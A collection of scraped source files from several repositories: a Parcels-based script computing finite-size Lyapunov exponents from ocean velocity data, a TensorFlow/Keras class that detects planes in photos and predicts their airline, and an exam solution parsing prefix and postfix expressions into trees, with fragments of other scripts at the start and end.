stat = df[df[column_names[0]] == i][(df[column_names[1]] > j - 0.1) & (df[column_names[1]] < j + 0.1)].mean()
count_info = df[df[column_names[0]] == i][(df[column_names[1]] > j - 0.1) & (df[column_names[1]] < j + 0.1)].shape
print("Count")
print("method: " + i + " noise level: " + str(j))
print(count_info)
#print(stat)
new_info = new_info.append(stat, ignore_index=True)
print(new_info)
statistical_info[i] = new_info
kys = statistical_info.keys()
for i in kys:
print("**************")
print(i)
print(statistical_info[i])
plot_info(statistical_info, column_names[1], column_names[2])
plot_info(statistical_info, column_names[1], column_names[3])
plot_info(statistical_info, column_names[1], column_names[4])
if __name__ == "__main__":
main()
``` |
{
"source": "joaob-centec/fsle",
"score": 2
} |
#### File: joaob-centec/fsle/Compute_FSLE_WIbUS_Monthly.py
```python
from parcels import FieldSet, ParticleSet, JITParticle, AdvectionRK4, ErrorCode
import xarray as xr
import numpy as np
import pandas as pd
#from pyproj import Geod
import datetime
#import cartopy.crs as ccrs
#import cartopy.feature as cfeature
#import matplotlib.pyplot as plt
import argparse
import os
import glob
import matplotlib.dates
## Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("fYear", type=int, help="year of computation")
parser.add_argument("fMonth", type=int, help="month of computation")
parser.add_argument("fStep", type=int, help="FSLE field time step (days)")
parser.add_argument("outStep", type=int, help="trajectory output time step (hours)")
parser.add_argument("maxD", type=float, help="distance threshold")
parser.add_argument("iniD", type=int, help="initial distance (grid subsample)")
parser.add_argument("maxT", type=int, help="max trajectory integration interval (days)")
parser.add_argument("timeStep", type=float, help="trajectory integration time step (minutes)")
parser.add_argument("westLon", type=float, help="westernmost longitude (-180º to 180º)")
parser.add_argument("eastLon", type=float, help="easternmost longitude (-180º to 180º)")
parser.add_argument("southLat", type=float, help="southermost latitude (-90º to 90º)")
parser.add_argument("northLat", type=float, help="northermost latitude (-90º to 90º)")
parser.add_argument("z", type=float, help="depth (positive downwards)")
args = parser.parse_args()
# 1. Distance threshold:
maxD=float(args.maxD) # in m
# 2. Initial distance (as a function of velocity grid spacing):
iniD = args.iniD
# 3. Maximum integration time interval:
maxT=datetime.timedelta(days=args.maxT)
# 4. Integration timestep (<0 --> backward FSLE)
timeStep=-datetime.timedelta(minutes=args.timeStep)
# Initial time of the velocity field
vInitialDate=datetime.datetime(1999,6,1,12,0,0)
# FSLE grid
lonMin= args.westLon # ºE
lonMax= args.eastLon # ºE
latMin= args.southLat # ºN
latMax= args.northLat # ºN
zMin= 0 # Surface
zMax= 300 # m
# Compute FSLE for year/month
fYear = args.fYear
fMonth = args.fMonth
# FSLE field step in days
fStep = args.fStep
# FSLE field dates
# Particle trajectory output step in hours
outStep = args.outStep
# Echo input parameters
print("FSLE computation with following parameters: ")
print(" fYear: "+str(fYear))
print(" fMOnth: "+str(fMonth))
print(" maxD:"+str(maxD))
# 3.1 Get velocity grid lon/lat
# Velocity grid file
vGridFileName = 'IBI_Data/IBI_MULTIYEAR_PHY_005_002-TDS_199906.nc'
# Velocity grid variables names
vLat = "latitude"
vLon = "longitude"
vDepth = "depth"
# Load velocity grid data
vGridData = xr.open_dataset(vGridFileName)
# Show info of the data
#print(vGridData)
# Velocity grid lon/lat limited to FSLE grid limits
tmpL = vGridData.latitude.sel(latitude = slice(latMin, latMax))
fLat0 = xr.DataArray(data=tmpL.values, dims=["j"], coords=[np.arange(tmpL.size)])
tmpL = vGridData.longitude.sel(longitude = slice(lonMin, lonMax))
fLon0 = xr.DataArray(data=tmpL.values, dims=["i"], coords=[np.arange(tmpL.size)])
fZ = vGridData.depth.sel(depth = slice(zMin, zMax))
# Interpolate latitude and longitude to get FSLE grid nodes
fJ = np.linspace(0,fLat0.size-1,fLat0.size*iniD-1,endpoint=True)
fI = np.linspace(0,fLon0.size-1,fLon0.size*iniD-1,endpoint=True)
fLat = fLat0.interp(j=fJ)
fLon = fLon0.interp(i=fI)
nF = fLat.size * fLon.size
nLat = fLat.size
nLon = fLon.size
# Create initial condition vectors
fLonI, fLatI = np.meshgrid(fLon,fLat,sparse=False,indexing='xy')
## Compute neighbor particle index grid
# Grid with particle number
fNeig = np.reshape(np.arange(nF),fLonI.shape).astype(int)
# Arrays with neighbour particle indices
iNeig = np.zeros((nLat, nLon, 4),dtype=np.int16)
for j in range(nLat):
for i in range(nLon):
iNeig[j,i,0] = fNeig[j,min(i+1,nLon-1)]
iNeig[j,i,1] = fNeig[j,max(i-1,0)]
iNeig[j,i,2] = fNeig[min(j+1,nLat-1),i]
iNeig[j,i,3] = fNeig[max(j-1,0),i]
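# Editor's note: iNeig[j, i, :] stores the flat indices of the four neighbouring
# particles (i+1 and i-1 in longitude, j+1 and j-1 in latitude), clamped at the
# grid edges so boundary particles reuse themselves as neighbours.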
# Grid with center particle distance (greatest distance between particle (i,j) and neighbour particles (i+1,j).(i-1,j),(i,j+1),(i,j-1))
fDist = np.zeros(fNeig.shape)
fIDist = np.zeros(fNeig.shape) # Initial distances
def haversine(lonC,latC,lonN,latN):
# Computes the great-circle distance between particles.
# Uses the Haversine formulas (http://www.movable-type.co.uk/scripts/gis-faq-5.1.html).
# dlon = lon2 - lon1
# dlat = lat2 - lat1
# a = sin^2(dlat/2) + cos(lat1) * cos(lat2) * sin^2(dlon/2)
# c = 2 * arcsin(min(1,sqrt(a)))
# d = R * c
distC=np.zeros(lonN.shape) # A nLat x nLon x 4 array
# If any particle is deleted (position is nan,nan), set position to c particle, so that distance is 0
for i in range(4):
nanN = np.where(np.isnan(lonN[:,:,i]),True,False)
lonN[nanN,i]=lonC[nanN]
latN[nanN,i]=latC[nanN]
for i in range(4):
dLon = (lonN[:,:,i] - lonC)*np.pi/180.
dLat = (latN[:,:,i] - latC)*np.pi/180.
A = np.sin(0.5*dLat)**2 + np.cos(latC*np.pi/180) * np.cos(latN[:,:,i]*np.pi/180) * np.sin(0.5*dLon)**2
C = 2 * np.arcsin(np.fmin(1,np.sqrt(A)))
distC[:,:,i] = 6371000 * C
return np.max(distC,axis=2)
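# --- Editor's sanity check for haversine (illustrative, safe to delete) ---
# One degree of longitude at the equator is roughly 111.19 km; the arrays below
# mimic the (nLat, nLon, 4) neighbour layout expected by the function.
_lonC = np.zeros((1, 1)); _latC = np.zeros((1, 1))
_lonN = np.zeros((1, 1, 4)); _latN = np.zeros((1, 1, 4))
_lonN[0, 0, 0] = 1.0
assert abs(haversine(_lonC, _latC, _lonN, _latN)[0, 0] - 111194.93) < 1.0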
# Compute initial distances (distances with obs=0)
eLon = np.zeros((nLat,nLon,4))
eLat = np.zeros((nLat,nLon,4))
for i in range(4):
eLon[:,:,i] = np.reshape(fLonI.flat[iNeig[:,:,i].flatten()],(nLat,nLon))
eLat[:,:,i] = np.reshape(fLatI.flat[iNeig[:,:,i].flatten()],(nLat,nLon))
fIDist = haversine(fLonI,fLatI,eLon,eLat)
# Set up the velocity fields in a FieldSet object
velocityFiles=sorted(glob.glob('/home/joao/Ciencia/FSLE_WIbUS/IBI_Data/IBI_MULTIYEAR_PHY_005_002-TDS_*.nc'))
#fname = '/home/joao/Ciencia/FSLE_WIbUS/IBI_Data/*.nc'
filenames = {'U': velocityFiles, 'V': velocityFiles}
variables = {'U': 'uo', 'V': 'vo'}
dimensions = {'U': {'lat': 'latitude', 'lon': 'longitude', 'time': 'time'},
'V': {'lat': 'latitude', 'lon': 'longitude', 'time': 'time'}}
fieldset = FieldSet.from_netcdf(filenames, variables, dimensions)
# Define recovery kernel
def DeleteParticle(particle, fieldset, time):
# Delete particles who run out of bounds.
#print("Particle %d deleted at (%f, %f, %f)" % (particle.id,
# particle.lon, particle.lat,
# particle.depth))
particle.delete()
## Compute the FSLE fields
fDate = datetime.datetime(fYear,1,1,12,0,0) # Reference date (not used below; the actual FSLE dates are built from fYear/fMonth in fDates)
nowDate = datetime.datetime.now()
# First FSLE field on the 1st of fMonth at 12:00, then every fStep days until the end of that month
# (roll the year over when fMonth is December)
nextMonthStart = datetime.datetime(fYear + fMonth // 12, fMonth % 12 + 1, 1, 12, 0, 0)
fDates = pd.date_range(datetime.datetime(fYear, fMonth, 1, 12, 0, 0),
                       nextMonthStart - datetime.timedelta(days=1), freq=str(fStep)+'D')
nDates = fDates.size
fField = np.zeros((nLat, nLon, nDates))
k = 0 # Loop Counter
fFileTag = str(fYear)+"{:02d}".format(fMonth)
particlesFile="fParticles"+ fFileTag +".nc"
while k < 1:#nDates:
print("compute FSLE for " + fDates[k].strftime("%Y-%m-%d %H:%M:%S"))
countTime = datetime.datetime.now()-nowDate
countTimeDays = countTime.days
countTimeHours = int(countTime.seconds/3600)
countTimeMinutes = int((countTime.seconds/3600-countTimeHours)*60)
countTimeSeconds = countTime.seconds - countTimeHours*3600 - countTimeMinutes*60
print(" at " + str(countTimeDays) + " days, " + str(countTimeHours) + " hours, "
+ str(countTimeMinutes) + " minutes, " + str(countTimeSeconds) + " seconds. ")
## Define the particles type and initial conditions in a ParticleSet object
fSetTime = fDates[k]-vInitialDate # Release date in seconds from vInitialDate
fSet = ParticleSet(fieldset=fieldset, # the fields on which the particles are advected
pclass=JITParticle, # the type of particles (JITParticle or ScipyParticle)
lon=fLonI.flatten(), # release longitudes
lat=fLatI.flatten(), # release latitudes
time=fSetTime.total_seconds(), # Release time (seconds from first time of velocity field )
depth=np.full(nF,args.z), # release depth
)
output_file = fSet.ParticleFile(name=particlesFile, outputdt=3600*outStep) # the file name and the time step of the outputs
fSet.execute(AdvectionRK4, # the kernel (which defines how particles move)
runtime=maxT, # the total length of the run
dt=timeStep, # the timestep of the kernel
recovery={ErrorCode.ErrorOutOfBounds: DeleteParticle},
output_file=output_file)
# 4. Exporting the simulation output to a netcdf file
output_file.export()
output_file.close()
# Load trajectory data
fData = xr.open_dataset(particlesFile)
#print(fData)
#print(fData.z[dict(traj=5,obs=slice(0,100))])
    fCalc = np.ones(fDist.shape, dtype=bool) # True while a particle still needs its separation computed (i.e. it has not yet reached maxD)
#fT0 = np.reshape(fData.time[:,0].values,fLonI.shape) # Initial time (we need this to compute elapsed time until distanced threshold is reached)
fT = np.zeros(fLonI.shape) # Save here the time distance has reached maxD
fDist = np.zeros(fLonI.shape) # Save here the distance
    for m in np.arange(1,fData.dims['obs']): # Loop over observation times
# Active particles at observation m
activeParticles = np.where(fCalc,True,False)
# Filter active particles
fTraj = np.reshape(fData.trajectory[:,m].values,(nLat,nLon))
# Deleted active particles at observation m
deletedParticles = np.where(np.logical_and(np.isnan(fTraj),activeParticles), True, False)
# Compute interparticle Distance
cLon = np.reshape(fData.lon[:,m].values,(nLat,nLon))
cLat = np.reshape(fData.lat[:,m].values,(nLat,nLon))
for i in range(4):
eLon[:,:,i] = np.reshape(fData.lon[:,m].values[iNeig[:,:,i].flatten()],(nLat,nLon))
eLat[:,:,i] = np.reshape(fData.lat[:,m].values[iNeig[:,:,i].flatten()],(nLat,nLon))
# Distance computed at observation m for those particles that are still active and have not been deleted
distanceParticles = np.logical_and(np.logical_not(deletedParticles),activeParticles)
fDistTmp = np.where(distanceParticles,haversine(cLon,cLat,eLon,eLat),0)
# Where distance is greater than threshold, set final distance
distFlag = np.where(fDistTmp>maxD, True, False)
# Set distance and time
        setDist = distFlag # particles whose separation exceeded maxD at this observation
fDist[setDist]=fDistTmp[setDist]
obsT=np.reshape(fData.time[:,m].values-fData.time[:,0].values,(nLat,nLon))
fT[setDist]=obsT[setDist]
filterParticle = np.logical_or(setDist, deletedParticles)
fCalc[filterParticle]=False
if m % 500 == 0:
print(" Computing distances at observation " + str(m))
## Compute FSLE
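    # FSLE definition assumed below: lambda = ln(delta_f / delta_0) / tau, where delta_0 = fIDist is the
    # initial particle separation, delta_f = fDist is the separation when the maxD threshold was reached,
    # and tau = fT is the elapsed time; cff1 holds the numerator and cff2 the (sign-flipped) elapsed time in days.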
cff1=np.log(fDist/fIDist)
cff2=-fT/(1000000000*86400.) # From nanoseconds to days
    fField[:,:,k] = cff1 / cff2
# Do some cleanup
del fData
os.remove(particlesFile)
# Step counter
k = k + 1
## Save FSLE data as xarray DataSet
#fsleData = xr.DataArray(fField, coords=[fLat, fLon, fDates], dims=["latitude", "longitude", "time"])
fsleData = xr.Dataset(
{
"fsle":(["latitude","longitude","time"],fField)
},
coords={
"latitude":("latitude",fLat),
"longitude":("longitude",fLon),
"time":("time",fDates)
}
)
fsleData["fsle"].attrs['units'] = 'day-1'
fsleData["fsle"].attrs['standard_name'] = 'finite-size lyapunov exponent'
fsleData.attrs['distance_threshold'] = maxD
fsleData.attrs['initial_distance (subsampling of background velocity field grid)'] = iniD
fsleData.attrs['maximum particle integration time (T0 + seconds)'] = maxT.total_seconds()
fsleData.attrs['particle integration time step'] = timeStep.total_seconds()
fsleData.attrs['particle trajectory output time step (hours)'] = outStep
fsleData.attrs['velocity grid source']=vGridFileName
fsleData.attrs['velocity data source']=velocityFiles
fsleOutputFile = "FSLE_WIbUS_" + fFileTag + ".nc" #str(fYear) + ".nc"
fsleData.to_netcdf(fsleOutputFile,encoding={"time": {"dtype": "double"}})
``` |
{
"source": "joaobi/planespotter",
"score": 2
} |
#### File: planespotter/libs/planespotter.py
```python
import warnings
import os
import sys
#sys.path.append("C:/projects/models/research/")
#sys.path.append("C:/projects/models/research/object_detection")
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__),'../libs')))
with warnings.catch_warnings():
warnings.filterwarnings("ignore",category=FutureWarning)
from tensorflow.python.keras.models import load_model
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image, ExifTags
# import keras.backend as K
#import time
import tensorflow as tf
from object_detection.utils import ops as utils_ops
#import ops as utils_ops
from PIL import ImageDraw
import PIL.ImageFont as ImageFont
import json
PATH_TO_OUTPUT_DIR = 'output'
DEBUG = False
MODEL_DIR = 'models'
#
# Prediction Model
#
predict_model_name = '6airlines_75epochs_200_3.h5'
#PREDICT_MODEL = os.path.join(MODEL_DIR,predict_model_name)
labels = {0: 'EK', 1: 'KE', 2: 'NH', 3: 'OZ', 4:'QF', 5:'SQ'}
airline_names = {0: 'Emirates', 1: 'Korean Air', 2: 'ANA', 3: 'Asiana', 4:'Qantas', 5:'Singapore Airlines'}
SIZE = 500 # Resize for better inference
photo_size = 200 # Size for loading into CNN
#
# Detection Model
#
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_FROZEN_GRAPH = 'frozen_inference_graph.pb'
PLANE_DETECTION_THRESHOLD = 0.60 # Detect planes above this prob. threshold
BB_COLOR = "blue"
BB_TEXT_COLOR = "white"
class planespotter:
def __init__(self, model_location = MODEL_DIR):
# print('INIT')
self._init_detector(detect_model_loc =
os.path.join(model_location,PATH_TO_FROZEN_GRAPH))
# print('Loaded Detector')
self._init_predictor(pred_model_location =
os.path.join(model_location,predict_model_name))
# print('Loaded Predictor')
def _init_detector(self, detect_model_loc):
self.model_name = detect_model_loc
# print(self.model_name)
self._build_obj_detection_graph()
        # Holds the loaded image; later replaced by the same image with bounding boxes drawn on it
        self.image_np = []
        # Bounding boxes for the detected planes
self.bbox = []
# Array with the cropped images of individual planes
self.cropped_planes = []
self.plane_idxs = []
self.output_dict = []
self.session = tf.Session(graph=self.detection_graph)
self.image_name = ''
def predict_image(self,image_name):
# 1. Detect planes on the image
self.detect_planes(image_name)
# print('Detected planes')
# 2. Predict the airline of each plane
self.predict_airline()
# print('Predicted Airline')
# 3. Draw the bounding boxes for each plane with airline and prob.
self.draw_custom_bounding_boxes()
# print('Drew BBs')
# 4. Clear to avoid errors
# tf.reset_default_graph() # for being sure
# K.clear_session()
# import gc
# gc.collect()
# print('CLOSING SESSION')
# self.session.close()
# tf.reset_default_graph()
"""
Detect Planes and Crop them in the provided image
"""
def detect_planes(self,image_name):
#
# 0. Pre Process Image
#
self.image_name = image_name
image = self._preprocess_image(image_name)
#
# 1. Detect all Planes on this image
#
# step_time = time.time()
# the array based representation of the image will be used later in order to prepare the
# result image with boxes and labels on it.
(im_width, im_height) = image.size
if image.format == 'PNG':
image = image.convert('RGB')
image_np = np.array(image.getdata()).reshape((im_height, im_width, 3)).astype(np.uint8)
# Actual detection.
output_dict = self._run_inference_for_single_image(image_np, self.detection_graph)
# print("[.............Detect objects] --- %.2f seconds ---" % (time.time() - step_time))
        # Keep only the detections that are planes (COCO class 5)
plane_idxs = np.where(output_dict['detection_classes']==5)
self.plane_idxs = plane_idxs
self.output_dict = output_dict
#
# 2. Crop Planes on this image
#
im_width, im_height = image.size
cropped_planes = []
self.bbox = []
at_least_one_ex = -1
num_planes_image = len(output_dict['detection_boxes'][plane_idxs])
num_planes_thresh = len(np.where(output_dict['detection_scores'][plane_idxs]
>PLANE_DETECTION_THRESHOLD)[0])
# I will still pick the highest if there are more than 0 but none is
# greater than the threshold
if num_planes_image > 0 and num_planes_thresh == 0:
at_least_one_ex = np.argmax(output_dict['detection_scores'][plane_idxs])
for plane in range(0,num_planes_image):
plane_acc_score = output_dict['detection_scores'][plane_idxs][plane]
if (plane_acc_score>PLANE_DETECTION_THRESHOLD or plane == at_least_one_ex):
ymin = output_dict['detection_boxes'][plane_idxs][plane][0]
xmin = output_dict['detection_boxes'][plane_idxs][plane][1]
ymax = output_dict['detection_boxes'][plane_idxs][plane][2]
xmax = output_dict['detection_boxes'][plane_idxs][plane][3]
xmargin = im_width*0.02
ymargin = im_height*0.02
area = (xmin * im_width-xmargin,
ymin * im_height-ymargin,
xmax * im_width+xmargin,
ymax * im_height+ymargin)
self.bbox.append([ymin,xmin,ymax,xmax])
cropped_planes.append(image.crop(area))
self.cropped_planes = cropped_planes
self.image_np = image_np
def draw_custom_bounding_boxes(self):
thickness = 1
color = BB_COLOR
bbox = self.bbox
airlines = self.predicted_airline
probs = self.predicted_prob
try:
font = ImageFont.truetype('arial.ttf', 10)
except IOError:
print('[ERROR] Could not load Font!!!')
font = ImageFont.load_default()
final_image = Image.fromarray(self.image_np)
draw = ImageDraw.Draw(final_image)
im_width, im_height = final_image.size
# print(airlines)
for i in range(0,len(airlines)):
ymin,xmin,ymax,xmax = bbox[i][0],bbox[i][1],bbox[i][2],bbox[i][3]
(left, right, top, bottom) = (xmin * im_width, xmax * im_width,
ymin * im_height, ymax * im_height)
draw.line([(left, top), (left, bottom), (right, bottom),
(right, top), (left, top)], width=thickness, fill=color)
text_bottom = top
display_str = '%s (%.2f%%)'%(airlines[i],probs[i])
text_width, text_height = font.getsize(display_str)
margin = np.ceil(0.05 * text_height)
draw.rectangle(
[(left, text_bottom - text_height - 2 * margin), (left + text_width,
text_bottom)],
fill=BB_COLOR)
draw.text(
(left + margin, text_bottom - text_height - margin),
display_str,
fill=BB_TEXT_COLOR,
font=font)
text_bottom -= text_height - 2 * margin
(im_width, im_height) = final_image.size
if final_image.format == 'PNG':
final_image = final_image.convert('RGB')
# final_image = final_image.resize((im_height, im_width), Image.ANTIALIAS)
# self.image_np = np.array(final_image.getdata()).astype(np.uint8)
self.image_np = np.array(final_image.getdata()).reshape(
(im_height, im_width, 3)).astype(np.uint8)
def _run_inference_for_single_image(self,image, graph):
# step_time = time.time()
# global detection_graph
with self.detection_graph.as_default():
sess = self.session
# Get handles to input and output tensors
ops = tf.get_default_graph().get_operations()
all_tensor_names = {output.name for op in ops for output in op.outputs}
tensor_dict = {}
for key in [
'num_detections', 'detection_boxes', 'detection_scores',
'detection_classes', 'detection_masks'
]:
tensor_name = key + ':0'
if tensor_name in all_tensor_names:
tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(
tensor_name)
if 'detection_masks' in tensor_dict:
# The following processing is only for single image
detection_boxes = tf.squeeze(tensor_dict['detection_boxes'], [0])
detection_masks = tf.squeeze(tensor_dict['detection_masks'], [0])
# Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.
real_num_detection = tf.cast(tensor_dict['num_detections'][0], tf.int32)
detection_boxes = tf.slice(detection_boxes, [0, 0], [real_num_detection, -1])
detection_masks = tf.slice(detection_masks, [0, 0, 0], [real_num_detection, -1, -1])
detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(
detection_masks, detection_boxes, image.shape[0], image.shape[1])
detection_masks_reframed = tf.cast(
tf.greater(detection_masks_reframed, 0.5), tf.uint8)
# Follow the convention by adding back the batch dimension
tensor_dict['detection_masks'] = tf.expand_dims(
detection_masks_reframed, 0)
image_tensor = tf.get_default_graph().get_tensor_by_name('image_tensor:0')
# print("[.............pre inference] --- %.2f seconds ---" % (time.time() - step_time))
# Run inference
# step_time = time.time()
output_dict = sess.run(tensor_dict,
feed_dict={image_tensor: np.expand_dims(image, 0)})
# print("[.............Inference] --- %.2f seconds ---" % (time.time() - step_time))
# step_time = time.time()
# all outputs are float32 numpy arrays, so convert types as appropriate
output_dict['num_detections'] = int(output_dict['num_detections'][0])
output_dict['detection_classes'] = output_dict[
'detection_classes'][0].astype(np.uint8)
output_dict['detection_boxes'] = output_dict['detection_boxes'][0]
output_dict['detection_scores'] = output_dict['detection_scores'][0]
if 'detection_masks' in output_dict:
output_dict['detection_masks'] = output_dict['detection_masks'][0]
# print("[.............Post Inference] --- %.2f seconds ---" % (time.time() - step_time))
return output_dict
def _build_obj_detection_graph(self):
# global detection_graph
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(self.model_name, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
self.detection_graph = detection_graph
def _preprocess_image(self,image_name):
img=Image.open(image_name)
if img.format=='JPEG':
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation]=='Orientation':
break
# Rotate the image if needed
if img._getexif() != None:
exif=dict(img._getexif().items())
if orientation in exif.keys():
if exif[orientation] == 3:
img=img.rotate(180, expand=True)
# resize to get better inference speeds
basewidth = SIZE
wpercent = (basewidth / float(img.size[0]))
hsize = int((float(img.size[1]) * float(wpercent)))
img = img.resize((basewidth, hsize), Image.ANTIALIAS)
return img
#
# Prediction Methods
#
def _init_predictor(self,pred_model_location):
try:
model = load_model(pred_model_location)
model.load_weights(pred_model_location)
model._make_predict_function()
self.model = model
self.preds = []
self.predicted_airline = []
self.predicted_prob = []
except Exception as e:
print("ERROR: _init_predictor "+ str(e))
def predict_airline(self):
self.preds = []
self.predicted_airline = []
self.predicted_prob = []
model = self.model
img_array = self.cropped_planes
try:
for img in img_array:
photo = img.resize((photo_size,photo_size), Image.ANTIALIAS)
x = np.array(photo)
x = x / 255.
x = np.expand_dims(x, axis=0)
preds = model.predict(x)
if DEBUG:
predicted_airline = labels[np.argmax(preds[0])]
prob = np.max(preds[0])
plt.title('Airline '+predicted_airline+' with acc. '+ str(prob))
plt.imshow(photo)
plt.axis('off')
plt.show()
predicted_airline = airline_names[np.argmax(preds[0])]
prob = np.max(preds[0])*100
self.preds.append(preds)
self.predicted_airline.append(predicted_airline)
self.predicted_prob.append(prob)
# print(preds)
except Exception as e:
print("[ERROR] [predict_airline]: "+ str(e))
def print_stats(self):
print("#objects detected: ",self.output_dict['num_detections'])
print("#planes detected: ",str(len(self.plane_idxs[0])))
thresh_nparr = np.where(self.output_dict['detection_scores'][self.plane_idxs]>PLANE_DETECTION_THRESHOLD)[0]
if len(self.plane_idxs[0])> 0 and len(thresh_nparr) == 0 :
num_planes_thresh = 1
else:
num_planes_thresh = len(thresh_nparr)
print("#planes shown: ",str(num_planes_thresh))
# print(self.preds)
for i in range(len(self.preds)):
# score = self.output_dict['detection_scores'][i]
# print("----->[Plane BBox %s]: %.2f%%"%(str(i),score))
# for j,score in np.ndenumerate(np.sort(self.preds[i][0])[::-1]):
# print('Probability %s => [%0.4f%%]' % (labels[j[0]]
# , score*100))
plane = sorted(dict(zip(labels,self.preds[i][0])).items(),key=lambda kv: kv[1])[::-1]
for j,score in plane:
print('Probability %s => [%0.4f%%]' % (labels[j]
, score))
def print_image(self):
IMAGE_SIZE = (12, 8)
plt.figure(figsize=IMAGE_SIZE)
plt.imshow(self.image_np)
plt.show()
def save_image(self,dir_path=PATH_TO_OUTPUT_DIR):
image = Image.fromarray(self.image_np)
filename = os.path.split(self.image_name)[-1]
image.save(os.path.join(dir_path, filename), 'JPEG',subsampling=0, quality=100)
def save_metadata(self,dir_path=PATH_TO_OUTPUT_DIR):
metadata = {}
metadata['filename'] = os.path.split(self.image_name)[-1]
metadata['num_detections'] = self.output_dict['num_detections']
metadata['planes_detected'] = len(self.plane_idxs[0])
thresh_nparr = np.where(self.output_dict['detection_scores'][self.plane_idxs]>PLANE_DETECTION_THRESHOLD)[0]
num_planes_thresh = len(thresh_nparr)
if len(self.plane_idxs[0])> 0 and num_planes_thresh == 0 :
num_planes_thresh = 1
metadata['planes_shown'] = num_planes_thresh
metadata['detection_boxes'] = self.output_dict['detection_boxes'][self.plane_idxs].tolist()
metadata['detection_scores'] = self.output_dict['detection_scores'][self.plane_idxs].tolist()
metadata['planes'] = []
for i in range(len(self.preds)):
name = 'plane_'+str(i)
tmp = {}
plane = sorted(dict(zip(labels,self.preds[i][0])).items(),key=lambda kv: kv[1])[::-1]
for j,score in plane:
print('Probability %s => [%0.4f%%]' % (labels[j]
, score*100))
# tmp['Airline_'+str(j)] = labels[j]
# tmp['ProbAir_'+str(j)] = score*100
tmp[labels[j]] = score*100
# for j,score in np.ndenumerate(np.sort(self.preds[i][0])[::-1]):
# print('Probability %s => [%0.4f%%]' % (labels[j[0]]
# , score*100))
# tmp['Airline_'+str(j[0])] = labels[j[0]]
# tmp['ProbAir_'+str(j[0])] = score*100
print(tmp)
# metadata[name] = tmp
print(json.dumps(tmp))
# metadata['planes'].append({'Airline_0': 'EK', 'ProbAir_0': 0.8939682, 'Airline_4': 'QF', 'ProbAir_4': 0.09370398, 'Airline_3': 'OZ', 'ProbAir_3': 0.009453673, 'Airline_5': 'SQ', 'ProbAir_5': 0.0014314898, 'Airline_1': 'KE', 'ProbAir_1': 0.00076366, 'Airline_2': 'NH', 'ProbAir_2': 0.0006790766})
metadata['planes'].append(json.dumps(tmp))
# print(metadata)
# print(json.dumps(metadata, indent=4))
# print(metadata)
metadata['predicted_airline'] = self.predicted_airline
metadata['predicted_prob'] = self.predicted_prob
print(metadata)
# print(json.dumps(metadata, indent=4))
return metadata
# json_data = json.dumps(metadata)
# return json_data
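# Hypothetical usage sketch (the models directory and image path below are illustrative,
# not files shipped with this module):
#
#   spotter = planespotter(model_location='models')
#   spotter.predict_image('samples/plane.jpg')
#   spotter.print_stats()
#   spotter.save_image('output')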
``` |
{
"source": "joaobose/CI3641-exam-1",
"score": 4
} |
#### File: pregunta-6/src/expression.py
```python
def isOperator(x):
return x == '+' or x == '-' or x == '*' or x == '/'
def hasLowestPrecedence(x):
return x == '+' or x == '-'
def hasHighestPrecedence(x):
return x == '*' or x == '/'
# We represent an expression as a binary tree,
# since all of the supported operators are binary.
class ExpressionTree:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
def infix(self):
        # Leaf nodes are numbers
if self.right is None and self.left is None:
return f'{self.value}'
leftExp = self.left.infix()
ownExp = f'{self.value}'
rightExp = self.right.infix()
if hasHighestPrecedence(ownExp):
            # Lower-precedence check on the left operand
            if hasLowestPrecedence(self.left.value):
                leftExp = f'({leftExp})'
            # Lower-precedence check on the right operand
            # Associativity check for (/)
            if hasLowestPrecedence(self.right.value) or self.right.value == '/':
                rightExp = f'({rightExp})'
        # Associativity check for (-)
elif ownExp == '-':
if hasLowestPrecedence(self.right.value):
rightExp = f'({rightExp})'
return f'{leftExp} {ownExp} {rightExp}'
def __call__(self):
        # Leaf nodes are numbers
        if self.left is None and self.right is None:
            return self.value
        # Evaluate the left and right subtrees
        leftEval = self.left()
        rightEval = self.right()
        # Apply the operator to the left and right results
if self.value == '+':
return leftEval + rightEval
if self.value == '-':
return leftEval - rightEval
if self.value == '*':
return leftEval * rightEval
else:
return leftEval // rightEval
# Builds an ExpressionTree from an expression in postfix notation
def postfixToExpressionTree(postfix):
    # We use a stack
    stack = []
    # Iterate over every token of the expression
    for char in postfix.strip().split(' '):
        # Case: the token is a number
if not isOperator(char):
            # Push a leaf node onto the stack
            stack.append(ExpressionTree(int(char)))
        # Case: the token is an operator
        else:
            # Create an operator node
            operator = ExpressionTree(char)
            # Since this is postfix, the operands are the two most recently built subtrees
right = stack.pop()
left = stack.pop()
operator.right = right
operator.left = left
            # Push the node onto the stack
            stack.append(operator)
    # Return the most recent expression,
    # that is, the root of the tree
    return stack.pop()
# Builds an ExpressionTree from an expression in prefix notation
def prefixToExpressionTree(prefix):
    # Helper that builds the ExpressionTree of an expression (in prefix notation) starting at index start.
    # Returns the ExpressionTree (if it exists) and the index where that ExpressionTree ends.
def parse(expression, start):
        # If start runs past the end of the expression, return None
if start >= len(expression):
return None, start
        # Get the token at the current position
        char = expression[start]
        # Case: the token is a number
        if not isOperator(char):
            # Return a leaf node
            return ExpressionTree(int(char)), start
        # Case: the token is an operator
else:
            # Parse the left sub-expression
            (leftExp, leftEnd) = parse(expression, start + 1)
            # Parse the right sub-expression (starting right after where leftExp ended)
            (rightExp, rightEnd) = parse(expression, leftEnd + 1)
            # Create the operator node
currentExp = ExpressionTree(char)
currentExp.left = leftExp
currentExp.right = rightExp
            # Return the operator node together with the index where it ends
return currentExp, rightEnd
(tree, _) = parse(prefix.strip().split(' '), 0)
return tree
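# Hypothetical usage sketch (the expressions below are illustrative inputs, not part of the exam statement):
#
#   tree = postfixToExpressionTree('8 3 - 2 *')
#   print(tree.infix())   # (8 - 3) * 2
#   print(tree())         # 10
#
#   same = prefixToExpressionTree('* - 8 3 2')
#   print(same.infix())   # (8 - 3) * 2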
``` |
{
"source": "joaobose/CI3641-exam-2",
"score": 3
} |
#### File: CI3641-exam-2/pregunta-5/type.py
```python
from lark import Lark, Transformer
def return_copy(f):
    # Decorator that returns a deep copy of the object returned by f.
